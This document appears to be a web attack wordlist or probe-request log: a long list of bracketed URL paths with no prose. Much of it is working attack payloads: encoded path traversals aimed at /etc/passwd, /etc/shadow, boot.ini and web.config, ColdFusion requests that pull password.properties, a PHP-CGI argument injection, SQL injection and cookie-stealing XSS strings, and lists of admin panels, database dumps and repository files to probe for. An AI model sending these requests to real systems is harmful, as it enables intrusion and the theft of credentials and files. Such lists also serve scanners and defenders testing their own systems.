[%2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd]
[%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fboot%2Eini]
[%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd]
[%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot%2Eini]
[%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd]
[%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd]
[%2F%2Fetc%2Fpasswd]
[%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini]
[%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini]
[..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb]
[..\\..\\..\..\\..\..\\..\..\\\boot.ini]
[/%3f*~1*/*.aspx?aspxerrorpath=/]
[/%3f*~10*/*.aspx?aspxerrorpath=/]
[/%3f*~11*/*.aspx?aspxerrorpath=/]
[/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini]
[/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%2fpasswd]
[/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini]
[/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini]
[/../../../../../../../../../../boot.ini]
[/../../../../../../../../../../etc/passwd]
[/../../../../../../../etc/passwd]
[/..\..\..\..\\..\..\\..\..\\\boot.ini]
[/..\/..\/..\/boot.ini]
[/..\/\..\/\..\/\boot.ini]
[/.bzr/README]
[/.git/HEAD]
[/.gitignore]
[/.hg/requires]
[/.hgignore]
[/.htaccess]
[/.htpasswd]
[/.nsf/../winnt/win.ini]
[/.svn/text-base/.htaccess.svn-base]
[/.svn/text-base/.htpasswd.svn-base]
[/.svn/text-base/Web.config.svn-base]
[/.svn/]
[///..%2f..%2f..%2f..%2fboot.ini]
[////..\..\..\boot.ini]
[//cmdownloads/?CMDsearch=%22.base64_decode%28%22bGxieXpvcXV6Y3JzcGVq%22%29.%22]
[//cmdownloads/?CMDsearch=%22.base64_decode%28%22YW5idWViem5yb2l3aGVy%22%29.%22]
[/1.sql]
[/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input]
[/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000]
[/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42]
[/?p4yl04d2=1%20UNION%20ALL%20SELECT%201,2,3,table_name%20FROM%20information_schema.tables,/?p4yl04d3=<script>alert(document.cookie)</script>]
[/?p4yl04d=../../../../../../../../../../../../../../../../../etc/passwd]
[/?parameter=%3Chellot%3Ehello]
[/?parameter=%3Cscript%3Ealert%281%29%3C%2Fscript%3E]
[/?parameter=../../../etc/passwd]
[/?parameter=<hellot>hello]
[/?parameter=<script>alert(1)</script>]
[/account.cfm]
[/account.jsp]
[/adm.cfm]
[/adm.jsp]
[/adm/admloginuser.cfm]
[/adm/admloginuser.jsp]
[/adm/index.cfm]
[/adm/index.jsp]
[/adm/index.php,/adm.php,/affiliate.php,/adm_auth.php,/memberadmin.php,/administratorlogin.php,/account.cfm,/admin/account.cfm,/admin/index.cfm,/admin/login.cfm,/admin/admin.cfm]
[/admin-console/]
[/admin-login.cfm]
[/admin-login.jsp]
[/admin.cfm,/admin/admin_login.cfm,/admin_login.cfm,/adminpanel.cfm,/admin/controlpanel.cfm,/admincontrol.cfm,/panel-administracion/login.cfm,/admin/cp.cfm,/pages/admin/admin-login.cfm,/admincp/index.cfm,/admincp/login.cfm,/admin_area/admin.cfm,/admin_area/login.cfm,/moderator/login.cfm,/administrator/login.cfm,/moderator.cfm,/modelsearch/index.cfm,/panel-administracion/admin.cfm,/adm/admloginuser.cfm,/adm.cfm,/adm_auth.cfm,/administratorlogin.cfm,/webadmin.cfm,/webadmin/index.cfm,/modelsearch/login.cfm,/login.cfm,/administrator.cfm,/administrator/account.cfm,/adminLogin.cfm,/siteadmin/login.cfm,/admin2/index.cfm,/adm/index.cfm,/admin_area/index.cfm,/bb-admin/index.cfm,/bb-admin/login.cfm,/bb-admin/admin.cfm,/siteadmin/index.cfm,/memberadmin.cfm,/admin2/login.cfm,/admloginuser.cfm,/admincontrol/login.cfm]
[/admin.cfm]
[/admin.jsp]
[/admin/account.cfm]
[/admin/account.jsp]
[/admin/admin-login.cfm]
[/admin/admin-login.jsp]
[/admin/admin.cfm]
[/admin/admin.jsp]
[/admin/adminLogin.cfm]
[/admin/adminLogin.jsp]
[/admin/admin_login.cfm]
[/admin/admin_login.jsp]
[/admin/backup/]
[/admin/controlpanel.cfm]
[/admin/controlpanel.jsp]
[/admin/cp.cfm]
[/admin/cp.jsp,/cp.jsp,/administrator/account.jsp,/administrator.jsp,/login.jsp,/modelsearch/login.jsp,/moderator.jsp,/moderator/login.jsp,/administrator/login.jsp,/moderator/admin.jsp,/controlpanel.jsp,/user.jsp,/admincp/index.jsp,/admincp/login.jsp,/admincontrol.jsp,/admin/account.jsp,/adminpanel.jsp,/webadmin.jsp,/webadmin/index.jsp,/webadmin/admin.jsp,/webadmin/login.jsp,/admin/admin_login.jsp,/admin_login.jsp,/panel-administracion/login.jsp,/adminLogin.jsp,/admin/adminLogin.jsp,/home.jsp,/adminarea/index.jsp,/adminarea/admin.jsp,/adminarea/login.jsp,/panel-administracion/index.jsp,/panel-administracion/admin.jsp,/modelsearch/index.jsp,/modelsearch/admin.jsp,/administrator/index.jsp,/admincontrol/login.jsp,/adm/admloginuser.jsp,/admloginuser.jsp,/admin2.jsp,/admin2/login.jsp,/admin2/index.jsp]
[/admin/cp.jsp]
[/admin/download/backup.sql]
[/admin/home.cfm]
[/admin/home.jsp]
[/admin/index.cfm]
[/admin/index.jsp]
[/admin/jscript/upload.pl]
[/admin/login.cfm]
[/admin/login.jsp]
[/admin2.jsp]
[/admin2/index.cfm]
[/admin2/index.jsp]
[/admin2/login.cfm]
[/admin2/login.jsp]
[/adminarea/admin.cfm]
[/adminarea/admin.jsp]
[/adminarea/index.cfm]
[/adminarea/index.jsp]
[/adminarea/login.cfm]
[/adminarea/login.jsp]
[/admincontrol.cfm]
[/admincontrol.jsp]
[/admincontrol/login.cfm]
[/admincontrol/login.jsp]
[/admincp/index.cfm]
[/admincp/index.jsp]
[/admincp/login.cfm]
[/admincp/login.jsp]
[/administr8.cfm]
[/administr8.jsp]
[/administracao.cfm]
[/administracao.jsp]
[/administracion.cfm]
[/administracion.jsp]
[/administrator.cfm]
[/administrator.jsp]
[/administrator/account.cfm]
[/administrator/account.jsp]
[/administrator/index.cfm]
[/administrator/index.jsp]
[/administrator/login.cfm]
[/administrator/login.jsp]
[/administratorlogin.aspx,/siteadmin/login.aspx,/siteadmin/index.aspx,/account.jsp,/admin/index.jsp,/admin/login.jsp,/admin/admin.jsp,/admin_area/admin.jsp,/admin_area/login.jsp,/admin_area/index.jsp,/bb-admin/index.jsp,/bb-admin/login.jsp,/bb-admin/admin.jsp,/admin/home.jsp,/admin/controlpanel.jsp,/admin.jsp,/pages/admin/admin-login.jsp,/admin/admin-login.jsp,/admin-login.jsp]
[/administratorlogin.cfm]
[/administratorlogin.jsp]
[/AdminLogin.cfm]
[/adminLogin.cfm]
[/AdminLogin.jsp,/AdminLogin.aspx,/AdminLogin.cfm,/admin108/,/pec_admin/,/system/admin/,/plog-admin/,/ESAdmin/,/axis2-admin/,/_sys/,/admin_cp.asp,/sitecore/admin/,/sitecore/login/admin/,/backup/,/backup,/backup.sql,/backup.sql.gz,/backup.sql.bz2,/backup.zip,/backups/,/bak/,/back/,/cache/backup/,/admin/backup/,/dbbackup.txt,/b.sql,/db.sql,/ddb.sql,/users.sql,/database.sql,/mysql.sql,/dump.sql,/respaldo.sql,/data.sql,/old.sql,/usuarios.sql,/bdb.sql,/1.sql,/admin/download/backup.sql,/clientaccesspolicy.xml,/atom/,/atom.aspx,/atom.php]
[/AdminLogin.jsp]
[/adminLogin.jsp]
[/adminpanel.cfm]
[/adminpanel.jsp]
[/admins.cfm]
[/admins.jsp]
[/admin_area/admin.cfm]
[/admin_area/admin.jsp]
[/admin_area/index.cfm]
[/admin_area/index.jsp]
[/admin_area/login.cfm]
[/admin_area/login.jsp]
[/admin_login.cfm]
[/admin_login.jsp]
[/admloginuser.cfm]
[/admloginuser.jsp]
[/adm_auth.cfm]
[/adm_auth.jsp]
[/atom.jsp]
[/atom.xml,/atom.jsp,/rss/,/rss.aspx,/rss.php,/rss.xml,/rss.jsp,/etc/passwd,/boot.ini,/example/,/examples/,/iissamples/,/j2eeexamples/,/j2eeexamplesjsp/,/sample/,/ncsample/,/fpsample/,/cmsample/,/samples/,/mono/1.1/index.aspx,/login/,/login.htm,/login.jsp,/test.asp,/test.class,/test/,/test.htm,/test.html,/test.php,/test.txt,/webmail/,/mail/,/log/,/log.htm,/log.php,/log.asp,/log.aspx,/log.jsp,/logs/,/logs.htm,/logs.php,/logs.asp,/logs.aspx,/logs.jsp]
[/axis2/,/happyaxis.jsp,/web-console/ServerInfo.jsp,/web-console/Invoker,/invoker/JMXInvokerServlet,/invoker/,/jmx-console/,/admin-console/,/CFIDE/administrator/enter.cfm,/CFIDE/administrator/entman/index.cfm,/cfide/install.cfm,/CFIDE/administrator/archives/index.cfm,/CFIDE/wizards/common/_logintowizard.cfm,/CFIDE/componentutils/login.cfm,/CFIDE/Administrator/startstop.html,/common/help/en/go/login_ts.html,/system/login/,/system/login/reset?next=%2Fsystem%2Flogin&set-lang=en,/common/images/logos/img_logoMain.jpg,/Dashboard/Dashboard.html]
[/axis2/axis2-web/HappyAxis.jsp]
[/b.sql]
[/backup.sql.bz2]
[/backup.sql.gz]
[/backup.sql]
[/backup.zip]
[/backup/]
[/bb-admin/admin.cfm]
[/bb-admin/admin.jsp]
[/bb-admin/index.cfm]
[/bb-admin/index.jsp]
[/bb-admin/login.cfm]
[/bb-admin/login.jsp]
[/bdb.sql]
[/boot.ini]
[/cache/backup/]
[/cacti/,/zabbix/,/extrahop/,/nagios/,/console/,/manager/html/,/manager/status/,/manager/text/,/tomcat/manager/html/,/tomcat/manager/status/,/tomcat/manager/text/,/cognos_express/manager/html/,/host-manager/html/,/host-manager/text/,/tomcat/host-manager/html/,/tomcat/host-manager/text/,/system/console,/lc/system/console,/axis2/axis2-admin/,/ui/authentication/,/admin,/logo_t.gif,/view/viewer_index.shtml,/PSIA/Custom/SelfExt/userCheck,/server/TCPIPGEN.htm,/api/id/,/login.html]
[/CFIDE/adminapi/administrator.cfc?method=login&adminpassword=&rdsPasswordAllowed=true]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/administrator/archives/index.cfm]
[/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en]
[/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en]
[/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en]
[/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en]
[/CFIDE/administrator/enter.cfm]
[/CFIDE/administrator/entman/index.cfm]
[/CFIDE/administrator/images/loginbackground.jpg]
[/CFIDE/Administrator/startstop.html]
[/CFIDE/componentutils/login.cfm]
[/cfide/install.cfm]
[/CFIDE/wizards/common/_logintowizard.cfm]
[/cgi-bin/awstats.pl]
[/cgi-bin/config.exp]
[/cgi-bin/ffileman.cgi?]
[/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd]
[/cgi-mod/index.cgi]
[/cgi-mod/smtp_test.cgi]
[/cgi-mod/view_help.cgi]
[/client/VMware-viclient.exe]
[/console/login/loginForm.jsp]
[/controlpanel.cfm]
[/controlpanel.jsp]
[/cp.cfm]
[/cp.jsp]
[/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config]
[/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini]
[/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties]
[/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\log\dbpwdChange.log]
[/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties]
[/data.sql]
[/database.sql]
[/databases/acidcat_3.mdb]
[/db.sql]
[/db/users.mdb]
[/ddb.sql]
[/debug.cgi]
[/dsp_page.cfm]
[/dump.sql]
[/etc/passwd]
[/flexfm/,/lib/usermanagement/userInfo.php,/security/xamppsecurity.php,/system/console,/dm-albums/dm-albums.php,/ibm/console/logon.jsp?action=OK,/console/,/console/portal/0/Welcome,/rest/applinks/1.0/manifest,/jira/rest/applinks/1.0/manifest,/secure/rest/applinks/1.0/manifest,/rest/servicedeskapi/info,/jira/rest/servicedeskapi/info,/secure/rest/servicedeskapi/info,/rest/applinks/1.0/manifest,/confluence/rest/applinks/1.0/manifest,/wiki/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/bitbucket/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/bamboo/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/crowd/rest/applinks/1.0/manifest,/x_logo.gif,/gif/hp.gif,/gif/hp_invent_logo.gif,/gif/printer.gif,/hp/device/this.LCDispatcher,/hp/device/webAccess/index.htm,/PageSelector.class,/images/lexbold.gif,/images/lexlogo.gif,/images/printer.gif,/printer/image,/images/mute_alloff.gif,/images/pic_bri.gif,/scanweb/images/scanwebtm.gif,/view/index.shtml,/phpmyadmin/,/phpMyAdmin/]
[/happyaxis.jsp]
[/help/../../etc/shadow]
[/HNAP1/,/.htaccess,/.htpasswd,/_vti_bin/,/_vti_cnf/,/_vti_log/,/_vti_pvt/,/_vti_txt/,/postinfo.html,/_vti_bin/_vti_aut/author.dll,/_vti_bin/_vti_aut/author.exe,/_vti_bin/_vti_aut/dvwssr.dll,/_vti_bin/_vti_adm/admin.dll,/_vti_bin/_vti_adm/admin.exe,/_vti_bin/fpcount.exe?Page=default.asp|Image=3,/_vti_bin/shtml.dll,/_vti_bin/shtml.exe,/_vti_pvt/_x_todo.htm,/_vti_pvt/_x_todoh.htm]
[/home.jsp]
[/host-manager/html/]
[/host-manager/text/]
[/ibm/console/logon.jsp?action=OK]
[/includes/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm]
[/includes/FCKeditor/editor/filemanager/browser/default/connectors/perl/connector.cgi]
[/includes/FCKeditor/editor/filemanager/browser/default/connectors/py/connector.py]
[/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)]
[/Info.live.htm]
[/intruvert/jsp/module/Login.jsp]
[/invoker/JMXInvokerServlet]
[/jmx-console/]
[/kbcat.cgi]
[/level/15/exec/-/configure/http]
[/log.jsp]
[/login.cfm]
[/login.jsp]
[/logs.jsp]
[/main_configure.cgi]
[/manager/html/upload]
[/mdb-database/dblog.mdb]
[/memberadmin.cfm]
[/memberadmin.jsp]
[/modelsearch/admin.cfm]
[/modelsearch/admin.jsp]
[/modelsearch/index.cfm]
[/modelsearch/index.jsp]
[/modelsearch/login.cfm]
[/modelsearch/login.jsp]
[/moderator.cfm]
[/moderator.jsp]
[/moderator/admin.cfm]
[/moderator/admin.jsp]
[/moderator/login.cfm]
[/moderator/login.jsp]
[/mxportal/home/MxPortalFrames.jsp]
[/mysql.sql]
[/nagios3/cgi-bin/statuswml.cgi]
[/officescan/console/html/cgi/cgiChkMasterPwd.exe]
[/old.sql]
[/OvCgi/Toolbar.exe]
[/pages/admin/admin-login.cfm]
[/pages/admin/admin-login.jsp]
[/panel-administracion/admin.cfm]
[/panel-administracion/admin.jsp]
[/panel-administracion/index.cfm]
[/panel-administracion/index.jsp]
[/panel-administracion/login.cfm]
[/panel-administracion/login.jsp]
[/phpinfo.php]
[/phpMyAdmin-2.8.0.2/,/phpMyAdmin-2.8.0.3/,/phpMyAdmin-2.8.0.4/,/phpMyAdmin-2.8.1-rc1/,/phpMyAdmin-2.8.1/,/phpMyAdmin-2.8.2/,/sqlmanager/,/php-myadmin/,/phpmy-admin/,/mysqladmin/,/mysql-admin/,/websql/,/_phpmyadmin/,/footer1.gif,/homepage.nsf/homePage.gif?OpenImageResource,/icons/ecblank.gif,/852566C90012664F,/admin4.nsf,/admin5.nsf,/admin.nsf,/agentrunner.nsf,/alog.nsf,/a_domlog.nsf,/bookmark.nsf,/busytime.nsf,/catalog.nsf,/certa.nsf,/certlog.nsf,/certsrv.nsf,/chatlog.nsf,/clbusy.nsf,/cldbdir.nsf,/clusta4.nsf,/collect4.nsf,/da.nsf,/dba4.nsf,/dclf.nsf,/DEASAppDesign.nsf,/DEASLog01.nsf,/DEASLog02.nsf,/DEASLog03.nsf,/DEASLog04.nsf]
[/phpmyadmin/]
[/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00,/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234,/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20,/d41d8cd98f00b204e9800998ecf8427e.php,/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0,/rom-0,/Telerik.Web.UI.DialogHandler.aspx?dp=////,/Telerik.Web.UI.DialogHandler.ashx?dp=////,/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////,/uir//etc/passwd,/uir//tmp/csman/0,/cgi-bin/export_debug_msg.exp,/cgi-bin/config.exp,/,/readme.html,/,?feed=rss,?feed=rss2,?feed=atom,/feed,/feed/,/feed/rss,/feed/rss2,/feed/atom]
[/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00]
[/ReqWebHelp/advanced/workingSet.jsp]
[/respaldo.sql]
[/restoreinfo.cgi]
[/rom-0]
[/root/,/rsrc/,/ruby/,/sales/,/save/,/script/,/ScriptLibrary/,/scripts/,/search/,/search-ui/,/sec/,/secret/,/secured/,/secure/,/security/,/sell/,/server/,/server-info/,/servers/,/server_stats/,/serverstats/,/server-status/,/service/,/services/,/servicio/,/servicios/,/servlet/,/servlets/,/session/,/setup/,/shared/,/sharedtemplates/,/share/,/shell-cgi/,/shipping/,/shop/,/shopper/,/show/,/SilverStream/,/siteadmin/,/site/,/sitemgr/,/siteminderagent/,/siteminder/]
[/rss.jsp]
[/scripts/WPnBr.dll]
[/sd/workorder/FileDownload.jsp]
[/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml]
[/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml]
[/sdk/../../../../../../../etc/vmware/hostd/vmInventory.xml]
[/sdk/../../../../../..//etc/vmware/hostd/vmInventory.xml]
[/server-status/]
[/server-status]
[/setup.cgi]
[/siteadmin/index.cfm]
[/siteadmin/index.jsp]
[/siteadmin/login.cfm]
[/siteadmin/login.jsp]
[/smquar.nsf,/smsolar.nsf,/smtime.nsf,/smtpibwq.nsf,/smtpobwq.nsf,/smtp.box,/smtp.nsf,/smvlog.nsf,/srvnam.htm,/statmail.nsf,/statrep.nsf,/stauths.nsf,/stautht.nsf,/stconfig.nsf,/stconf.nsf,/stdnaset.nsf,/stdomino.nsf,/stlog.nsf,/streg.nsf,/stsrc.nsf,/userreg.nsf,/vpuserinfo.nsf,/webadmin.nsf,/web.nsf,/.nsf/../winnt/win.ini,/icons/ecblank.gif,/_api/version,/_layouts/images/helpicon.gif,/Pages/Default.aspx,/PublishingImages/NewsArticleImage.jpg,/_admin/operations.aspx,/_app_bin,/_controltemplates,/_layouts,/_layouts/viewlsts.aspx,/forms/allitems.aspx,/forms/webfldr.aspx,/forms/mod-view.aspx,/forms/my-sub.aspx,/pages/categoryresults.aspx,/categories/viewcategory.aspx,/sitedirectory]
[/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234]
[/tomcat/host-manager/html/]
[/tomcat/host-manager/text/]
[/tools_admin.cgi?]
[/trace/,/heapdump/,/jolokia/,/vmware/,/vmware/imx/vmware_boxes-16x16.png,/ui/,/ui/imx/vmwareLogo-16x16.png,/ui/imx/vmwarePaperBagLogo-16x16.png,/ui/vManage.do,/client/VMware-viclient.exe,/en/welcomeRes.js,/citrix/,/Citrix/,/Citrix/MetaFrame/auth/login.aspx,/images/ctxHeader01.jpg,/images/Safeword_Token.jpg,/sw/auth/login.aspx,/vpn/images/AccessGateway.ico,/citrix/AccessPlatform/auth/clientscripts/,/AccessPlatform/auth/clientscripts/,/Citrix//AccessPlatform/auth/clientscripts/cookies.js,/Citrix/AccessPlatform/auth/clientscripts/login.js,/Citrix/PNAgent/config.xml,/cgi-bin/image/shikaku2.png,/config/public/usergrp.gif,/pictures/buttons/file_view_mark.gif,/cpqlogin.htm?RedirectUrl=/&RedirectQueryString=,/hplogo.gif,/ie_index.htm,/ilo.gif,/images/icon_server_connected.gif,/mxhtml/images/signin_logo.gif,/mxhtml/images/status_critical_15.gif,/mxportal/home/en_US/servicetools.gif,/mxportal/home/MxPortalFrames.jsp,/xymon/menu/menu.css,/rrc.htm,/manager/html/upload,/manager/html,/axis2/axis2-web/HappyAxis.jsp]
[/ts/in.cgi?open2]
[/uir//etc/passwd]
[/updown.php,/modules/docmanager/doctypetemplates/myuploadedfile,/ReqWebHelp/advanced/workingSet.jsp,/dhost/,/engine/api/api.class.php,/jsft_resource.jsf,/scales_static_resource.jsf,/setup/password_required.html,/zp-core/,/amember/,/.hgignore,/.gitignore,/.bzrignore,/debug.seam,/CSS/Miniweb.css,/S7Web.css,/Portal0000.htm,/arcsight/,/arcsight/images/logo-login-arcsight.gif,/arcsight/images/navbar-icon-logout-on.gif]
[/upload_multiple_js.php,/uploadtester.asp,/info.php,/phpinfo.php,/kusabax/manage_page.php,/plus/lurking.php,/adm/barra/assetmanager/assetmanager.php,/eyeos/,/NETWARE.HTM,/setup.cgi,/debug.cgi,/ehcp/?op=applyforftpaccount,/ehcp/?op=applyforaccount,/ehcp/?op=applyfordomainaccount,/vhosts/ehcp/?op=applyforftpaccount,/vhosts/ehcp/?op=applyforaccount,/vhosts/ehcp/?op=applyfordomainaccount,/tools_admin.cgi?,/level/15,/exec/show/log/CR,/level/15/exec/-/configure/http,/level/15/exec/-,/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report,/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report,/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server,/console/login/loginForm.jsp,/login_img.jpg,/cirronetlogo.gif,/browserId/wizardForm.jhtml,/webline/html/forms/callback.jhtml,/webline/html/forms/callbackICM.jhtml,/webline/html/agent/AgentFrame.jhtml,/webline/html/agent/default/badlogin.jhtml,/callme/callForm.jhtml,/webline/html/multichatui/nowDefunctWindow.jhtml,/browserId/wizard.jhtml,/admin/CiscoAdmin.jhtml,/msccallme/mscCallForm.jhtml,/webline/html/admin/wcs/LoginPage.jhtml]
[/user.cfm]
[/user.jsp]
[/users.sql]
[/usuarios.sql]
[/web-console/Invoker]
[/web-console/ServerInfo.jsp]
[/webadmin.cfm]
[/webadmin.jsp]
[/webadmin/admin.cfm]
[/webadmin/admin.jsp]
[/webadmin/index.cfm]
[/webadmin/index.jsp]
[/webadmin/login.cfm]
[/webadmin/login.jsp]
[/workorder/FileDownload.jsp]
[/wp%-login]
[/wp-config.bak]
[/wp-config.php.bak]
[/wp-config.php~]
[/wwwlog/,/wwwlogs/,/mail_log_files/,/images/rails.png,/mono/,/robots.txt,/crossdomain.xml,/css/cake.generic.css,/img/cake.icon.gif,/img/cake.icon.png,/js/vendors.php,/cgi-bin/ffileman.cgi?,/fshow.php,/admin/upload.php]
[/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00]
[/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00]
[/\../\../\../boot.ini]
[/_phpmyadmin/]
[/_vti_bin/fpcount.exe?Page=default.asp|Image=3]
[/_vti_bin/shtml.dll]
[/_vti_bin/shtml.exe]
[/_vti_bin/]
[/_vti_bin/_vti_adm/admin.dll]
[/_vti_bin/_vti_adm/admin.exe]
[/_vti_bin/_vti_aut/author.dll]
[/_vti_bin/_vti_aut/author.exe]
[/_vti_bin/_vti_aut/dvwssr.dll]
